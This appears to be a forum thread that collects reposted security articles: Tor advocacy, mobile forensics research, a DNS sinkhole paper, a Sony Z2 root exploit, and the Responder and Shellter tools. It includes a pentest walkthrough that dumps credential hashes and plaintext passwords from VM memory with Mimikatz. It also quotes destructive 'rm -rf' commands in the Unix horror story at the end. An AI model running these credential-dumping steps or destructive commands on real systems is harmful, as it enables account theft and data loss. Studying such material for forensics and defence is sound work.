Nytro

Tor Is For Everyone: Why You Should Use Tor EFF recently kicked off our second Tor Challenge, an initiative to strengthen the Tor network for online anonymity and improve one of the best free privacy tools in existence. The campaign—which we've launched with partners at the Freedom of the Press Foundation, the Tor Project, and the Free Software Foundation—is already off to a great start. In just the first few days, we've seen over 600 new or expanded Tor nodes—more than during the entire first Tor Challenge. This is great news, but how does it affect you? To understand that, we have to dig into what Tor actually is, and what people can do to support it. Support can come in many forms, too. Even just using Tor is one of the best and easiest things a person can do to preserve privacy and anonymity on the Internet. What is Tor? Tor is a network and a software package that helps you anonymously use the Internet. Specifically Tor hides the source and destination of your Internet traffic, this prevents anyone from knowing both who you are and what you are looking at (though they may know one or the other). Tor also hides the destination of your traffic, which can circumvent some forms of censorship. Tor has been in development for many years and is very stable and mature. It is regarded as one of the best privacy tools currently in existence and it does not cost you anything. How does Tor help me? This graphic shows how Tor and https can work together to protect your privacy on the Internet. Basically, Tor encrypts that data you send across the Internet in multiple layers, like an onion. Then it sends that data through multiple relays, each one of which peels a layer off the onion until your packet leaves the final relay and gets to its destination. This is called 'onion routing' and it is a fantastic method for keeping privacy on the web. Proper use of tor—along with HTTPS Everywhere—can be one of the best ways to ensure your browsing will remain anonymous. But I don't need privacy, I have nothing to hide! Everyone needs privacy sometimes! For example: perhaps you end up with an embarrassing medical condition and you want to search for information about it but you don't want Google and every advertiser to know about your bodily functions. Tor can help you keep that information private. Tor can also help prevent online tracking more generally as well. Proper use of Tor can circumvent most third party trackers that governments and corporations can use to track your browsing habits and send you obnoxious intrusive advertisements. Tor can also protect your data from hackers on your network. Tor can also help you get around censorship and firewalls from the filter at your school or office or even help you circumvent firewalls or censorship put in place by your government. How do I use Tor? The easiest way to get up and running with Tor is to use the Tor Browser Bundle. It is a version of Firefox that comes preconfigured to use Tor. Tor Browser Bundle is set up to use Tor the right way so that you will avoid a lot of the common pitfalls that can pierce your veil of anonymity. If your prefer a more holistic approach or wish to use Tor for something other than just web browsing, you can use Tails. Tails is an operating system that runs off of a live CD. It is configured so that all Internet connections run through Tor; and when you are done, everything that you did is wiped clean from your computer's memory. It never touches your hard drive and leaves no traces on your computer. If you want to use Tor on your android phone, check out Orbot, it can run your browsing and other programs through Tor. Tor sounds great. What can I do to help? To help make Tor faster and more secure one of the best things you can do is set up a Tor relay. That's what we're asking people to do in our Tor Challenge. The more relays there are in the Tor network the more speed and security Tor has. Setting up a relay may also improve your own personal anonymity. But even just using Tor increases the anonymity of all the other users. There's some safety in numbers: if the only people using Tor are those who have a serious need for it then any use of Tor is suspicious. But if Tor gets used for everything from pizza orders to looking at funny cat photos then it is much less so. So if I use Tor will I have perfect anonymity all of the time? Nothing is foolproof, not even Tor. If you use Tor the wrong way you can end up destroying your own anonymity. If you use Tor to log into Facebook or Gmail, for example, they may not know where you are coming from but they will certainly know who you are and they may even be able to track your browsing around the web. The Tor Project has posted a list of common mistakes that inexperienced users sometimes make. When used properly Tor is one of the best tools for internet privacy that exists. You can use it to circumvent firewalls in an oppressive country, retain your privacy, or browse the Internet while at school. Setting up and running Tor is easy and it is one of the best things any citizen of the Internet can do to help keep a free and open Internet. And if you can run a Tor relay, or want to commit to boosting the bandwidth on a relay you already run, you can take part in our Tor Challenge and push us over our target while collecting prizes. Check out the Tor Challenge today. Sursa: https://www.eff.org/deeplinks/2014/06/why-you-should-use-tor

Blackberry Forensics 1.0. UNLOCKED BLACKBERRY DEVICES Unlocked BlackBerry device with no password Situation •BB contains memory card and SIM. •Which type of data extraction should be performed and in what order? •Physical, File System, then Logical? Examiner Considerations: •There are a variety of tools available to the examiner. •Start Physical, if supported,then move to File System and Logical. •Wear Leveling •A data structure at the logical level, in the form of a logical backup/acquisition is different than the same record at the physical level. •** In rare cases performing a physical with UFED may cause device to reset itself to factory default. •This referred by Cellebrite as “cache memory reset”. Download: https://digital-forensics.sans.org/summit-archives/dfir14/BlackBerry_Forensic_Nuggets_Shafik_Punja_and_Cindy_Murphy.pdf

DNS Sinkhole This paper describes the architecture and configuration of a complete Domain Name Services (DNS) sinkhole system based on open-source software. The DNS sinkhole can be used to provide detection and prevention of malicious and unwanted activity occurring between organization computer systems and the Internet. The system is inexpensive, effective, scalable and easy to maintain. Download: https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523

Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net> Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. Download: https://cansecwest.com/csw07/csw07-nazario.pdf

[h=3]Mimikatz Against Virtual Machine Memory Part 2[/h] Short update to talk about mostly performing the actions from Part 1 on Windows 8+ and Windows Server 2012 First issue was symbols in windbg. Most importantly, NO symbols for windbg. I found this article that lets you remotely download them: Use the Microsoft Symbol Server to obtain debug symbol files .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols 0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols 0: kd> .reload Loading Kernel Symbols ............................................................... ................................................................ .............. Loading User Symbols Loading unloaded module list ......... Second issue was creating the dmp file. I tried volatility's imagecopy and The Windows Memory Toolkit. Neither produced a dump file that would work with windbg for Windows 8 or Windows 2012. What did work was VMWare's vmss2core utility. Note for VMware workstation/fusion you need to pass it the .vmsn and .vmem files (shown above) For VMware ESXi i just needed to pass the .vmsn file The rest follows the same flow as the previous post 1. Load the memory.dmp file vmss2core created 2. Fix your symbols (shown above) 3. Load the mimilib.dll file kd> .load C:\users\user\desktop\mimilib.dll 4. Find the lsass process kd> !process 0 0 lsass.exe PROCESS ffffe00112f08080 SessionId: 0 Cid: 01e8 Peb: 7ff623aac000 ParentCid: 0194 DirBase: 06291000 ObjectTable: ffffc001f8f0c400 HandleCount: Image: lsass.exe 5. Switch to that process kd> .process /r /p ffffe00112f08080 Implicit process is now ffffe001`12f08080 Loading User Symbols ................................................................ 6. Run Mimikatz kd> !mimikatz 7. Drink Beers Posted by CG at 11:45 AM Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 2

[h=3]Mimikatz Against Virtual Machine Memory Part 1[/h]Pentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on all those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and I reminisced about the missed shells. This post and part 2 is like that for me. I can't count the number of times i've had access to the folder full of an organization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on them to carve out useful pieces of the file system but not memory. While doing some research on vCenter/ESXi I came across a couple of blog posts on the subject: Extract Windows passwords from VMware .vmem file WinDbg et l’extension de mimikatz | Blog de Gentil Kiwi Password dump from a Hyper-V Virtual Machine´s memory | vNiklas Virtualization blog This of course sent me down the rabbit hole to see if I could do it. Remko's post mentions you need a few things: The Windows debugging tools: Debugging Tools for Windows Direct Download - Remko Weijnen's Blog (Remko's Blog) WinDBG | Blog de Gentil Kiwi The Windows Memory Toolkit MoonSols Windows Memory Toolkit | MoonSols Current mimikatz that supports the windbg magic https://github.com/gentilkiwi/mimikatz Gotcha #1: The free version of Windows Memory Toolkit limits OS and architecture you can do this on. Restrictions are 32bit up to Windows Server 2008. The process: #1 Copy the vmem/vmsn from the remote host #2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for pay version below) C:\Users\user\Desktop>Bin2Dmp.exe "Windows Server 2008 x64-b2afd86a.vmem" win2k8.dmp bin2dmp - v2.1.0.20140115 Convert raw memory dump images into Microsoft crash dump files. Copyright (C) 2007 - 2014, Matthieu Suiche Copyright (C) 2012 - 2014, MoonSols Limited Initializing memory descriptors... Done. Directory Table Base is 0x124000 Looking for Kernel Base... Looking for kernel variables... Done. Loading file... Done. nt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0 stuff happens [0x0000000040000000 of 0x0000000040000000] [0x000000001DAFE000 of 0x000000 MD5 = E8C2F318FA528285281C21B3141E7C51 Total time for the conversion: 0 minutes 14 seconds. you should now have a .dmp file you can load into windbg #3 Load the dmp file into windbg Gotcha #2: You may have to run .symfix and .reload kd> .symfix kd> .reload Loading Kernel Symbols ............................................................... ................................................................ ..... Loading User Symbols Loading unloaded module list .... #4 Load the mimilib.dll file kd> .load C:\users\user\desktop\mimilib.dll .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (May 25 2014 21:48:13) .## ^ ##. Windows build 6002 ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' WinDBG extension ! * * */ =================================== # * Kernel mode * # =================================== # Search for LSASS process 0: kd> !process 0 0 lsass.exe # Then switch to its context 0: kd> .process /r /p # And finally : 0: kd> !mimikatz =================================== # * User mode * # =================================== 0:000> !mimikatz =================================== The tool output will walk you through the rest #5 Find the lsass process kd> !process 0 0 lsass.exe PROCESS fffffa800dba26d0 SessionId: 0 Cid: 023c Peb: 7fffffd4000 ParentCid: 01e4 DirBase: 2e89f000 ObjectTable: fffff880056562c0 HandleCount: 1092. Image: lsass.exe #6 switch to the lsass context fffffa800dba26d0 in this case kd> .process /r /p fffffa800dba26d0 Implicit process is now fffffa80`0dba26d0 Loading User Symbols ................................................................ ...................... #7 Load mimikatz kd> !mimikatz Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : WIN-3C4WXGGN8QE$ Domain : UNLUCKYCOMPANY SID : S-1-5-20 msv : [00000002] Primary * Username : WIN-3C4WXGGN8QE$ * Domain : UNLUCKYCOMPANY * NTLM : ea2ed0b14406a168791adf5aee78fd0b * SHA1 : ab7bd2f6a64cf857c9d69dd65916622e3dc25424 tspkg : KO ---SNIP--- Authentication Id : 0 ; 173319 (00000000:0002a507) Session : Interactive from 1 User Name : Administrator Domain : UNLUCKYCOMPANY SID : S-1-5-21-2086621178-2413078777-1398328459-500 msv : [00000002] Primary * Username : Administrator * Domain : UNLUCKYCOMPANY * LM : e52cac67419a9a2238f10713b629b565 * NTLM : 64f12cddaa88057e06a81b54e73b949b * SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8 tspkg : * Username : Administrator * Domain : UNLUCKYCOMPANY * Password : Password1 wdigest : * Username : Administrator * Domain : UNLUCKYCOMPANY * Password : Password1 kerberos : * Username : Administrator * Domain : UNLUCKYCOMPANY.NET * Password : Password1 * Key List ---SNIP--- There were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2. CG Posted by CG at 12:37 PM Sursa: Carnal0wnage & Attack Research Blog: Mimikatz Against Virtual Machine Memory Part 1

Z2 Root Exploit Hey guys, this is a cross-post of sorts. I just got root execution on my stock Z2 Tablet and it appears that the same method should work for Z2 phone. I have a Z2 phone but just haven't tested it on that one yet. Here is my Linux script to grab the TA partition from Z2: https://mega.co.nz/#!bVYx2I4S!x-9qkv...VfbiAd0jEDDgWY [update, v4] DooMLoRD's Windows version: http://doomlord.xperia-files.com/dow...Y0X1dJTkRPV1M= Requirements: 1. Be on an early Z2 phone/tablet firmware. .69 is confirmed working, .402 is confirmed patched 2. Use Linux or something that has 'bash' Instructions: 1. Extract exploit.tar.gz and run ./root1.sh 2. Crash the system menu that appears by doing System Info -> Configuration or similar. 3. Run ./root2.sh 4. Repeat Step #2 3. Your TA.img should now be in /data/local/tmp. Use adb pull /data/local/tmp/TA.img to retrieve it. Tell me if it works or if you get any errors. Thanks. Sursa: Z2 Root Exploit - xda-developers

[h=2]Low level PC attack papers[/h]BIOS/Firmware: Attacking Intel BIOS BootKit: eEye BootRoot Bootkit: Deep Boot ... Sursa: A Timeline made with Timeglider, web-based timeline software

[h=1]Responder[/h]Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [h=1]INTRODUCTION[/h] This tool is first an LLMNR, NBT-NS and MDNS responder, it will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: NetBIOS Suffixes (16th Character of the NetBIOS Name)). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want this tool to answer to the Workstation Service request name suffix. Sursa: https://github.com/Spiderlabs/Responder

Translate regular Assembly into Extended Instructions SSEXY - Convert x86 Instruction into their SSE equivalent. For more information; read the slides and summary which can be found here. http://jbremer.org/ssexy.zip Sursa: https://github.com/jbremer/ssexy

[h=3]Monkeying around with Windows Phone 8.0[/h] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Ah, the wonders of Windows Phone 8.0 ... Failing eyesight, Frustration and Squirrel chasing[/TD] [/TR] [/TABLE] Currently, there is not much freely available documentation on how Windows Phone 8.0 stores data so it is hoped that the information provided in this post can be used as a stepping stone for further research / possible scripting. Hopefully, analysts will also be able to use this post to help validate any future tool results. Special Thanks to Detective Cindy Murphy (@CindyMurph), Lieutenant Jennifer Krueger Favour (@rednogn) and the Madison Police Department ("Forensicate Like A Champion!") for providing the opportunity and encouragement for this research. Unfortunately, due to time contraints and a limited test data set, I wasn't able to write an all-singing/all-dancing script. Instead, some one-off scripts were created to extract/sort the relevant data a lot quicker than it would have taken to do manually. Rather than releasing scripts that are customized for a limited set of test data (which I don't have easy access to any more) - this post will be limited to documenting the data sources/structures. OK, so no free tool and you're still here reading huh? In Yoda voice: "The nerd runs strong in this one" Thanks to Maggie Gaffney from Massachusetts State Patrol / Teel Technologies, the initial test data (.bin file) was sourced via JTAG from a Nokia 520 Windows 8.0 phone - a "cheap" smart phone common to prepaid plans. The .bin file was then opened in X-Ways Forensics to parse the 28(!) file system partitions and to export out files of interest. The exported files were then viewed in hex view using Cellebrite Physical Analyzer (love the data interpretation and colour coded bookmarking!). Later, we were also able to get our paws on some test data from a HTC PM23300 Windows Phone 8.0 phone courtesy of JoAnn Gibb from the Ohio Attorney Generals Office. It's awesome knowing people that know people! Note: The Nokia 520 does not display the full SMS timestamp info (threaded messages display date only). So while we can potentially re-create the order of threaded messages as per the test phone, we can't easily validate the exact time an SMS message was sent/received. There's a good chance that other Windows Phone 8.0 phones will use the same timestamp mechanism and hopefully they will display the full timestamp. [h=3]So where's the data?![/h] The SMS content, MMS file attachment info and Contacts information are stored (via the 28th Partition) in: \Users\WPCOMMSSERVICES\APPDATA\Local\Unistore\store.vol Various .dat files containing MMS content are also stored in sub-directories of: \SharedData\Comms\Unistore\data The Call log is stored in: \Users\WPCOMMSSERVICES\APPDATA\Local\UserData\Phone The "store.vol" and "Phone" files seem to be ESE Databases (see explanantions here and here) with the magic number of "xEF xCD xAB x89" present at bytes 4-8. Consequently, we tried opening "store.vol" using Nirsoft's ESE Database viewer but had limited success - the SMS message texts were not viewable however other data was. This suggests that maybe the "store.vol" file differs in some way from the ESE specification and/or the tool had issues reading the file. Joachim Metz has also both documented (here and here) and written a C library "libesedb" to extract ESE databases. Unfortunately, I didn't discover Joachim's library until after we started poking around .. Anyway, it was a pretty masochistic interesting exercise trying to reverse engineer the "store.vol" file. One possible benefit of this data diving is that it *might* also reveal unallocated/partially overwritten data records that might be ignored by libraries which read the amount of data declared (vs reading all the data present). This is pure speculation though as I don't know if old records are overwritten or just marked as invalid. Viewing "store.vol" using Cellebrite Physical Analyzer, relevant data was observed for text strings (eg phone numbers, SMS text strings) encoded in UTF-16 LE throughout the file. As a database file there will be tables. Each table will have columns of values (eg time, text content, flags). A single (table row) record will thus have data stored for each column. Table data will be organized within the file somehow (eg multiple SMS records organized into page blocks). So it is likely that finding a hit for a specific SMS will lead you to the contents of other SMS messages (potentially around the same timeframe). The Nokia 520 was actually locked with a 4 digit PIN when we started investigating. Without access to the phone, any manual inspection/validation would have been impossible. It was unknown if the phone would have been wiped if too many incorrect PINs were entered. So any guesses would have to be documented and carefully chosen. It wasn't looking good ... until a combination of thinking outside the box and a touch of luck lead us to an SMS text message (in "store.vol") with the required 4 digit code. Open sesame! [h=3]Some things we tried with the data ...[/h] To find specific SMS records we searched for unique/known strings from the SMS text (eg "Look! A Squirrel!"). A single record was found per SMS in "store.vol" and each record also contained a UTF-16-LE string set to "SMStext". To find contact information, we searched for known phone number strings (eg +16085551234, 123456, 1234). Some numbers were observed in "store.vol" in close proximity to "SMStext" strings while other instances were located close to what appeared to be contact information (eg contact names). To search for field markers and flags, we compared separate SMS text records and looked for patterns/commonalities in the hex. Sometimes the pattern was obvious (eg "SMStext" occurs in each SMS message) and sometimes it wasn't so obvious (sometimes there is no discernible pattern!). Figuring out the timestamp format being used was HUGE. Without it, we could not have figured out the order messages were sent/received. Using Cellebrite Physical Analyzer to view the "store.vol" hex, Eagle-eyed Cindy noticed that there were 8 byte groupings occurring before/after the SMS text content. These 8 bytes were usually around the same value range (eg in LE xFF03D2315FE1C701). Which is what you'd expect within a single message. Subsequent messages usually had larger values - which corresponds to messages sent/received at a later time. Like most hex viewers, Cellebrite Physical Analyzer can interpret a predefined number of bytes from the current cursor position and print a human friendly version. Using this, Calculon Cindy showed an otherwise oblivious monkey that these 8 byte groupings could be interpreted as MS FILETIME timestamps! To be honest, I was expecting smaller 4 byte timestamps - Silly monkey! By comparing the 8 byte values surrounding a specific SMS text message (eg "Look! A Squirrel!") with the date displayed on the phone for that message, we theorized that our mysterious timestamps were *probably* MS FILETIME timestamps (No. of 100 ns increments since 1 January 1601 in UTC). For example, xFF03D2315FE1C701 = Sat, 18 August 2007 06:15:37 UTC. As the phone did not display the exact time for each SMS, we could only use the order of threaded messages and the date displayed to somewhat confirm our theory. Various SMS sent/received dates on the phone were spot checked against a corresponding "store.vol" entry timestamp date and the date values consistently matched. [h=3]What the data looks like[/h] After some hex ray vision induced cross-eyedness (who knew that looking at hex is almost like a curse!), we think we've figured out some general data structures for SMS, MMS, Contacts and Call log records. There's still some unknowns/grey areas but it's a start. - On the data structure diagrams below, "?" is used to denote varying/unknown number of bytes. - FILETIMEs are LE 8 byte integers representing the number of 100 ns intervals since 1 JAN 1601. - In general, strings are null terminated and UTF-16-LE encoded (ie 2 bytes per character). [h=4]Sent / Received SMS records[/h] There are two types of SMS data structures which are mixed together. Each type of SMS structure contains a UTF-16-LE encoded string for "SMStext". However, one type contains phone number strings and the other does not. For later ease of understanding, we'll say these "SMStext" records occur in "Area 1". Initially, monkey was confused about why some SMS records had phone numbers and some didn't. However, by inspecting the unlocked phone, we were able to confirm that the SMS message records with no number corresponded to sent SMS. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Sent "SMStext" record (from Area 1 in "store.vol") [/TD] [/TR] [/TABLE] Note 1: Note the lack of Phone number information. From test data, FILETIME values (in red and pink) seemed a little inconsistent. Sometimes FILETIMEs within the same record matched each other and other times they varied by seconds/minutes. Note 2: The Sent Text string (in yellow) is null terminated and encoded in UTF-16-LE. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Received "SMStext" record (from Area 1 in "store.vol")[/TD] [/TR] [/TABLE] Note 1: Received SMS have multiple source phone number strings listed (in orange). These seem to remain constant within a given record (eg PHONE1 = PHONE2 = PHONE3) Note 2: Similar to Sent "SMStext" records, the FILETIMEs (in red and pink) within a record might/might not vary. Note 3: The Received Text string (in yellow) is null terminated and encoded in UTF-16-LE. To find out the destination phone number for a sent SMS we can make use of the factoid observed by searching "store.vol" for the FILETIMEs from a specific Sent "SMStext" record. It appears that FILETIMEs 1, 3 & 4 (in pink) from a given Sent "SMStext" record usually occur once in the entire "store.vol". The FILETIME2 value (in red) however, also appears in a second area ("Area 2"). This area has a bunch of different looking data records each containing the null terminated UTF-16-LE encoded string for "SMS". Also contained in each data record is a phone number string. The "Area 2" SMS records look like: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"SMS" record (from Area 2 in "store.vol")[/TD] [/TR] [/TABLE] Note 1: Each "SMS" record contains a UTF-16-LE encoded string for "SMS". Note 2: From both sets of test data, there seems to be a consistent number of bytes between: - The FILETIMEX (in red) and "SMS" string (in kermit green) and - The "SMS" string (in kermit green) and the Phone number string (in orange). So, each sent "SMStext" FILETIME2 value (from Area 1) should have a corresponding match with an "SMS" record's FILETIMEX value (in Area 2). In this way, we can match a sent "SMStext" message with the destination phone number via the FILETIME2 value. Sounds a little crazy right? But the test data seems to confirm this. Purrr! [h=4]Contacts[/h] Contact information is also located in "store.vol". There were 2 observed data structure types - both contained phone number and name information however, one data type had an extra 10 digit number string. It was later discovered via phone inspection that the records with the extra 10 digit strings corresponded with "Hotmail" address book entries. It would be interesting to see if the 10 digit number corresponded to a unique hotmail user ID of some kind. The second type of contacts structure was a "Phonebook" entry - presumably these contact types were entered into the phone by the user rather than slurped up from a Hotmail account. Common to both contact records were multiple occurrences of the same contact name and phone number. OCD phonebook, OCD phonebook, OCD phone book ... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Hotmail" Contacts record (from "store.vol")[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]"Phonebook" Contacts record (from "store.vol")[/TD] [/TR] [/TABLE] Note 1: The flag value (in red) which can be used to determine if the contact record is a "Hotmail" or "Phonebook" entry. Note 2: The potential 6 byte magic number (0xFFFFFF2A2A00) for Contact records should make it easier to find each entry. This was discovered by Sharp-eyed Cindy on the last day (by which time monkey had lost the will to live). Note 3: The 10 digit string (in pink) could be a potential Hotmail ID. [h=4]MMS data[/h] Further research is required for MMS records (eg linking timestamps and phone numbers to sent files). But here's what we've learned so far ... Various .dat files containing MMS content (eg there was a .dat file containing a sent JPEG and another .dat file containing the accompanying text) are stored in: \SharedData\Comms\Unistore\data under 3 sub-directories: "0", "2" and "7". These folders might correspond to Sent, Received and Draft??? There were multiple .dat files with similar names each seemingly containing info for different parts of the same MMS. In "store.vol", there are records containing the UTF-16-LE encoded string for "MMS". These records also contain 3 filename strings and a filetype string (possibly the MIME type eg "image/jpeg"). From my jet-lagged memory, I want to say that the filename strings were pointing to the same filename and there were multiple "MMS" entries for a single MMS message (ie each MMS message has three separate files associated with it). But you should probably should check it out for yourself ... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]MMS record (from "store.vol")[/TD] [/TR] [/TABLE] [h=4]Call log[/h] The Call log information is located in the "Phone" file. Each Call log record contains a flag (in blue) to mark whether a call record is Missed / Incoming / Outgoing. The flag values were confirmed via inspection of the phone and corresponding Call log record. There's also Start and Stop FILETIMEs, repeated contact names and repeated phone numbers. Of potential interest is a 10 digit ASCII encoded string (in grey) and what looks to be a GUID (in light purple). Each call record had the same GUID string value enclosed by "{}". Perhaps this GUID represents the phone device or the calling application??? I wonder if it would be consistent between different model phones... [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Call log record (from "Phone")[/TD] [/TR] [/TABLE] [h=3]Summary[/h] So there you have it - we started off knowing very little about Windows Phone 8.0 data storage and now we know a considerable amount more especially regarding SMS records. Due to time constraints, it was not possible to investigate the non-SMS related data areas (ie MMS, Call log, Contacts) with the same level of detail. However, it's probably better to share what we've discovered now as I don't know when I'll be able to perform further research. The observations in this post may not be consistent for Windows 8.1 and/or on other models of Windows phones but hopefully this post can still serve as a starting point. As always, check that the underlying data matches your expectations! It was really awesome having someone else to bounce ideas off when hex-diving. I'm pretty sure I would have missed some important details (eg the FILETIME timestamp) had it not been for another set of eyes. Of course, that's not always going to be possible so I also appreciated the other opportunities to work automonously / with minimal supervision. Someday monkey might have to do this on his lonesome! Initially, it was easy to tie my idea of success with the "I have to code a solution for every scenario/data set". It would have been awesome if I could have done that but the fact was - we didn't have any SMS messages from "store.vol" at the start and after running the one-off SMS script, we had 5000+ messages sorted in chronological order with their associated phone numbers. Success doesn't have to be black and white. It sounds cliche but focusing on little wins each day made it easier to start eating the metaphorical elephant. Now please excuse me, while I adjust my pants ... Posted by Cheeky4n6Monkey at 14:35 Sursa: Cheeky4n6Monkey - Learning About Digital Forensics: Monkeying around with Windows Phone 8.0

Shellter v1.0 Index ======= [1] What is it? [2] How does it work? [3] What does it trace? [4] Why do I need Shellter? [5] What types of apps can I use? [6] Can I use encoded/self-decrypting payloads? [7] What about self-modifying code? [8] What about relocations? [9] What about Multi-Thread Applications? [10] what about Anti-Reversing tricks? [11] What if the target process dies during tracing? [12] What if an internal engine related error occurs? [13] How do execution flow filters work? [14] How much time does it need for tracing and log filtering? [15] What options does Shellter provide? [16] System Requirements [17] What should I do if I want to send feedback? [18] What should I do if I want to report a bug? [19] What should I do if I don't like it? Readme: https://www.shellterproject.com/Downloads/Shellter/Readme.txt Sursa: https://www.shellterproject.com/download/

[h=1]OHM2013: RAM Memory acquisition using live-BIOS modification[/h]

*THE* classic Unix horror story Tue, 01/31/2006 - 10:11am — binford2k Try this in windows! Unix Recovery Legend This classic article from Mario Wolczko first appeared on Usenet in 1986. Have you ever left your terminal logged in, only to find when you came back to it that a (supposed) friend had typed "rm -rf ~/*" and was hovering over the keyboard with threats along the lines of "lend me a fiver 'til Thursday, or I hit return"? Undoubtedly the person in question would not have had the nerve to inflict such a trauma upon you, and was doing it in jest. So you've probably never experienced the worst of such disasters.... It was a quiet Wednesday afternoon. Wednesday, 1st October, 15:15 BST, to be precise, when Peter, an office-mate of mine, leaned away from his terminal and said to me, "Mario, I'm having a little trouble sending mail." Knowing that msg was capable of confusing even the most capable of people, I sauntered over to his terminal to see what was wrong. A strange error message of the form (I forget the exact details) "cannot access /foo/bar for userid 147" had been issued by msg. My first thought was "Who's userid 147?; the sender of the message, the destination, or what?" So I leant over to another terminal, already logged in, and typed grep 147 /etc/passwd only to receive the response /etc/passwd: No such file or directory. Instantly, I guessed that something was amiss. This was confirmed when in response to ls /etc I got ls: not found. I suggested to Peter that it would be a good idea not to try anything for a while, and went off to find our system manager. When I arrived at his office, his door was ajar, and within ten seconds I realised what the problem was. James, our manager, was sat down, head in hands, hands between knees, as one whose world has just come to an end. Our newly-appointed system programmer, Neil, was beside him, gazing listlessly at the screen of his terminal. And at the top of the screen I spied the following lines: # cd # rm -rf * Oh, shit, I thought. That would just about explain it. I can't remember what happened in the succeeding minutes; my memory is just a blur. I do remember trying ls (again), ps, who and maybe a few other commands beside, all to no avail. The next thing I remember was being at my terminal again (a multi-window graphics terminal), and typing cd / echo * I owe a debt of thanks to David Korn for making echo a built-in of his shell; needless to say, /bin, together with /bin/echo, had been deleted. What transpired in the next few minutes was that /dev, /etc and /lib had also gone in their entirety; fortunately Neil had interrupted rm while it was somewhere down below /news, and /tmp, /usr and /users were all untouched. Meanwhile James had made for our tape cupboard and had retrieved what claimed to be a dump tape of the root filesystem, taken four weeks earlier. The pressing question was, "How do we recover the contents of the tape?". Not only had we lost /etc/restore, but all of the device entries for the tape deck had vanished. And where does mknod live? You guessed it, /etc. How about recovery across Ethernet of any of this from another VAX? Well, /bin/tar had gone, and thoughtfully the Berkeley people had put rcp in /bin in the 4.3 distribution. What's more, none of the Ether stuff wanted to know[work?] without /etc/hosts at least. We found a version of cpio in /usr/local, but that was unlikely to do us any good without a tape deck. Alternatively, we could get the boot tape out and rebuild the root filesystem, but neither James nor Neil had done that before, and we weren't sure that the first thing to happen would be that the whole disk would be re-formatted, losing all our user files. (We take dumps of the user files every Thursday; by Murphy's Law this had to happen on a Wednesday). Another solution might be to borrow a disk from another VAX, boot off that, and tidy up later, but that would have entailed calling the DEC engineer out, at the very least. We had a number of users in the final throes of writing up PhD theses and the loss of a maybe a weeks' work (not to mention the machine down time) was unthinkable. So, what to do? The next idea was to write a program to make a device descriptor for the tape deck, but we all know where cc, as and ld live. Or maybe make skeletal entries for /etc/passwd, /etc/hosts and so on, so that /usr/bin/ftp would work. By sheer luck, I had a gnuemacs still running in one of my windows, which we could use to create passwd, etc., but the first step was to create a directory to put them in. Of course /bin/mkdir had gone, and so had /bin/mv, so we couldn't rename /tmp to /etc. However, this looked like a reasonable line of attack. By now we had been joined by Alasdair, our resident UNIX guru, and as luck would have it, someone who knows VAX assembler. So our plan became this: write a program in assembler which would either rename /tmp to /etc, or make /etc, assemble it on another VAX, uuencode it, type in the uuencoded file using my gnu, uudecode it (some bright spark had thought to put uudecode in /usr/bin), run it, and hey presto, it would all be plain sailing from there. By yet another miracle of good fortune, the terminal from which the damage had been done was still su'd to root (su is in /bin, remember?), so at least we stood a chance of all this working. Off we set on our merry way, and within only an hour we had managed to concoct the dozen or so lines of assembler to create /etc. The stripped binary was only 76 bytes long, so we converted it to hex (slightly more readable than the output of uuencode), and typed it in using my editor. If any of you ever have the same problem, here's the hex for future reference: 070100002c000000000000000000000000000000000000000000000000000000 0000dd8fff010000dd8f27000000fb02ef07000000fb01ef070000000000bc8f 8800040000bc012f65746300 I had a handy program around (doesn't everybody?) for converting ASCII hex to binary, and the output of /usr/bin/sum tallied with our original binary. But hang on---how do you set execute permission without /bin/chmod? A few seconds thought (which as usual, lasted a couple of minutes) suggested that we write the binary on top of an already existing binary, owned by me...problem solved. So along we trotted to the terminal with the root login, carefully remembered to set the umask to 0 (so that I could create files in it using my gnu), and ran the binary. So now we had a /etc, writable by all. From there it was but a few easy steps to creating passwd, hosts, services, protocols, (etc), and then ftp was willing to play ball. Then we 